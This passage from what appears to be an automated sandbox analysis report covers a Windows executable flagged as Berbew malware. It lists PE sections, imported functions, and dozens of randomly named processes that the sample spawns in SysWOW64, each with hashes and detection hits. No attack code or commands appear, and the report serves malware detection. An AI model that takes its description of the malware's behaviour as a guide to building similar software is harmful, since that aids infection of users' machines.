                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x6ef80x6ef81ed61149f456a49c3765939a69af4fdbFalse0.6444663475077443data7.190507132248476IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .data0x80000x212980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .data0x2a0000x2d700x2d7038e6b0b7b6588e0cb16762e2280c898dFalse0.41755502063273725data5.726258020923482IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata0x2d0000xe680xe6802e8785c395f6589c1765f361cd99074False0.39398047722342733data5.075876252835949IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .embm0x2e0000x10000x20083b0eaba5abe73085ef891c71bb1ce50False0.318359375data2.369404689922198IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x2f0000x20000x1a0096b79b031fcc987bb0c27baf92db9012False0.494140625data5.036907313519617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .idata0x310000x10000x200cf1b514888fa9c2e84873729046b3ef9False0.400390625data2.5395793360531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .idata0x320000x10000x20065fdd01c2b481c1fb7e2673ac91be88dFalse0.412109375data2.6695589518608314IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x330000x10000xe00cca50c934d91d5f84317bf02c25c7d4dFalse0.5655691964285714data5.20190474867528IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .text0x340000x10000xe004bf27c9996656745afffb0e19f4e2adfFalse0.5382254464285714data5.1612474383207205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .idata0x350000x10000x400837cb8e90dc41230c3543c60561e5a4dFalse0.4248046875data3.582369291213418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x360000x20000x1a0035e3bc77a50749d9bcd00baccd20b0deFalse0.49173677884615385data4.955758251079454IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x380000x30000x2600979b0ab00475a6cd052b7905ae584c09False0.4276315789473684data4.769958518554453IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .idata0x3b0000x10000x20060134637a9a41621b00fa141ff81c7faFalse0.4765625data3.3650250421312915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .idata0x3c0000x10000x200a88f6d241d49fd225bf10d219f204e06False0.4375data2.793576955047795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .text0x3d0000x20000x1800aba1b2f0115bb3713dc7c5b0cdbc0664False0.5017903645833334data5.034292397049128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Imports

                          DLLImport
                          ole32.DLLCoCreateInstance, CLSIDFromString, CoInitialize, CoUninitialize
                          OLEAUT32.DLLSysAllocString
                          WININET.DLLDeleteUrlCacheEntry, FindFirstUrlCacheEntryA, FindNextUrlCacheEntryA
                          KERNEL32.DLLExitProcess, ExpandEnvironmentStringsA, GetCommandLineA, GetCurrentProcessId, GetCurrentThreadId, GetExitCodeThread, GetFileSize, GetModuleFileNameA, GetModuleHandleA, CloseHandle, GetProcAddress, GetSystemDirectoryA, GetTempPathA, GetTickCount, GetVersion, GetVersionExA, GetWindowsDirectoryA, GlobalMemoryStatus, CopyFileA, InterlockedIncrement, IsBadReadPtr, IsBadWritePtr, LoadLibraryA, LocalAlloc, LocalFree, OpenMutexA, CreateFileA, ReadFile, RtlUnwind, SetFilePointer, CreateMutexA, Sleep, TerminateProcess, VirtualQuery, CreateProcessA, WaitForSingleObject, WideCharToMultiByte, WinExec, WriteFile, lstrlenA, lstrlenW, CreateThread, DeleteFileA
                          USER32.DLLGetWindowTextA, GetWindowRect, FindWindowA, GetWindow, GetClassNameA, SetFocus, GetForegroundWindow, LoadCursorA, LoadIconA, SetTimer, RegisterClassA, MessageBoxA, GetMessageA, GetWindowLongA, SetWindowLongA, CreateDesktopA, SetThreadDesktop, GetThreadDesktop, TranslateMessage, DispatchMessageA, SendMessageA, PostQuitMessage, ShowWindow, CreateWindowExA, DestroyWindow, MoveWindow, DefWindowProcA, CallWindowProcA
                          GDI32.DLLGetStockObject, SetBkColor, SetTextColor, CreateBrushIndirect, CreateFontA
                          ADVAPI32.DLLRegCreateKeyExA, RegCloseKey, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA, GetSecurityInfo, SetSecurityInfo, SetEntriesInAclA
                          CRTDLL.DLL__GetMainArgs, _sleep, _stricmp, atoi, exit, memcpy, memset, printf, raise, rand, signal, sprintf, srand, sscanf, strcat, strchr, strncmp, vsprintf
                          oleaut32.dllSysAllocString
                          ntdsapi.dllDsBindA, DsBindWithCredA
                          kernel32.dlllstrcpyW, FatalAppExitA, VirtualAlloc, GetEnvironmentStringsW, GetTimeFormatA, GetVolumeInformationA, CreateProcessW, FreeConsole, CreateFileMappingW, QueryPerformanceCounter, GetTempPathW, GetSystemTimeAsFileTime, SetPriorityClass, GetLongPathNameW, GetProfileIntA, GetTimeFormatW, DeleteFileA, IsBadReadPtr, SuspendThread, FileTimeToSystemTime, GetCurrentProcess
                          version.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                          dbghelp.dllSymSetOptions

                          Network Behavior

                          No network behavior found

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Users\user\Desktop\h879iieoae.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\h879iieoae.exe"
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:B6FF4E20E2B53B684A7CB84630D836FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:1
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Nejhbi32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Nejhbi32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:0603E4CBD8760D07DD7DCAB05A92238A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ogjdllpi.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ogjdllpi.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:B9761DC0E2D962AEFE92F6E1F3C1F250
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:3
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Opbieagi.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Opbieagi.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:04F64BB1853F025B09D78A47FA5C7F7B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:4
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Oglabl32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Oglabl32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:EB5F811B6A66908B38FB889817D5988F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:5
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Olijjb32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Olijjb32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:6E56FF877D11D4ED11AF106FBDDD4ACE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:6
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Oeanchcn.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Oeanchcn.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:1B2425A45E8ED6237FBE4E56F276A504
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:7
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Oceoll32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Oceoll32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:1DB24B47BF090833A70E0BEA68A38D9F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:8
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Onkcje32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Onkcje32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:7862075539A938767C526CCB7DF7CF4E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:9
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Odekfoij.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Odekfoij.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:A30DE8FF39A8563F2D7B9E36AD05A4C6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:10
                          Start time:19:58:56
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ojacofgb.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ojacofgb.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:AF41FAF03E8EAED376F154722746385B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000A.00000002.1986379697.000000000042A000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:11
                          Start time:19:58:57
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ppllkpoo.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ppllkpoo.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:38F64F662EE5C7E45202627AA7FCACCC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000B.00000002.1988867655.000000000042A000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:12
                          Start time:19:58:57
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Plbmqa32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Plbmqa32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:40D460D476E3EF9238CDEC233DCA293E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000C.00000002.1990903099.000000000042A000.00000004.00000001.01000000.0000000F.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:13
                          Start time:19:58:57
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Plgflqpn.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Plgflqpn.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:746D9DB8F43CEAFB79CE4693732F31F4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000D.00000002.1993494029.000000000042A000.00000004.00000001.01000000.00000010.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:14
                          Start time:19:58:57
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Pqeoao32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Pqeoao32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:A195A0011B7154E41E7FCDE5D8B4E0CA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000E.00000002.1998469389.000000000042A000.00000004.00000001.01000000.00000011.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:15
                          Start time:19:58:57
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Qgcpihjl.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Qgcpihjl.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:B46EDD174CAE8D3583851F8A26241E40
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000000F.00000002.2000063573.000000000042A000.00000004.00000001.01000000.00000012.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:16
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ajkolbad.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ajkolbad.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:9A076EA5029217C545E15BC92444072D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000010.00000002.2000741077.000000000042A000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:17
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bmlhnnne.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bmlhnnne.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:A98CEA1775884370D8699936D1B8E227
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000011.00000002.2001790871.000000000042A000.00000004.00000001.01000000.00000014.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:18
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bgamkfnl.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bgamkfnl.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:2DAF6E68C4322E5ABD5103F013110A0D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000012.00000002.2002333377.000000000042A000.00000004.00000001.01000000.00000015.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:19
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bqjacldl.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bqjacldl.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:D92B3B389B0B969DCC1638C63737002A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000013.00000002.2003694218.000000000042A000.00000004.00000001.01000000.00000016.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:20
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bnnampcf.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bnnampcf.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:F015A56D85709788B392A68459FEB024
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000014.00000002.2004277931.000000000042A000.00000004.00000001.01000000.00000017.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:21
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bnpnbp32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bnpnbp32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:7E024C6EF36928FEE4659AE588ED4D43
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000015.00000002.2005214969.000000000042A000.00000004.00000001.01000000.00000018.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:22
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Bgibkegc.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Bgibkegc.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:0DBB530A0BE511F3DC794C1024460A99
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000016.00000002.2005778309.000000000042A000.00000004.00000001.01000000.00000019.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:23
                          Start time:19:58:58
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Baagdk32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Baagdk32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:1F4BBF60BA2126DD626006EB2F22CA9D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000017.00000002.2006552400.000000000042A000.00000004.00000001.01000000.0000001A.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:24
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Cfnpmb32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Cfnpmb32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:3E45EB0DFCF7ACE28698143C3D650109
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000018.00000002.2007866947.000000000042A000.00000004.00000001.01000000.0000001B.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:25
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ccapffke.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ccapffke.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:713B5E4D81DBB20F5D48D2BC5501A007
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000019.00000002.2008521888.000000000042A000.00000004.00000001.01000000.0000001C.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:26
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Ceampi32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Ceampi32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:7008B57588331F2C9C3672BB96521844
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001A.00000002.2011076811.000000000042A000.00000004.00000001.01000000.0000001D.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:27
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Cnjaioih.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Cnjaioih.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:CA30D43E91B9417EA485DABDD1CCD228
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001B.00000002.2013905191.000000000042A000.00000004.00000001.01000000.0000001E.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:28
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Camgpi32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Camgpi32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:AFB7FE6A2325DC169AF337B02D73EA13
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001C.00000002.2016533194.000000000042A000.00000004.00000001.01000000.0000001F.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:29
                          Start time:19:58:59
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Dmfdkj32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Dmfdkj32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:8A37BEE9F75CA0545946D3034A19B27A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001D.00000002.2017016443.000000000042A000.00000004.00000001.01000000.00000020.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:30
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Dnhmjm32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Dnhmjm32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:305D22424B3635688BD806671F6F8A9C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001E.00000002.2018453034.000000000042A000.00000004.00000001.01000000.00000021.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:31
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Dfcboo32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Dfcboo32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:E467DF0B06CAE41308F8F0A6E1F35FBA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 0000001F.00000002.2019406612.000000000042A000.00000004.00000001.01000000.00000022.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:32
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Edgbhcim.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Edgbhcim.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:4396DFC06DB43385A7F834F79F6CA36B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
